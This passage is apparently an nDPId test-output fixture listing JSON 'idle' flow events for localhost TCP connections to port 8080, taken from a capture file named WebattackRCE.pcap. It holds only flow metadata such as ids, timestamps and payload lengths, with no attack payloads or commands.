-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
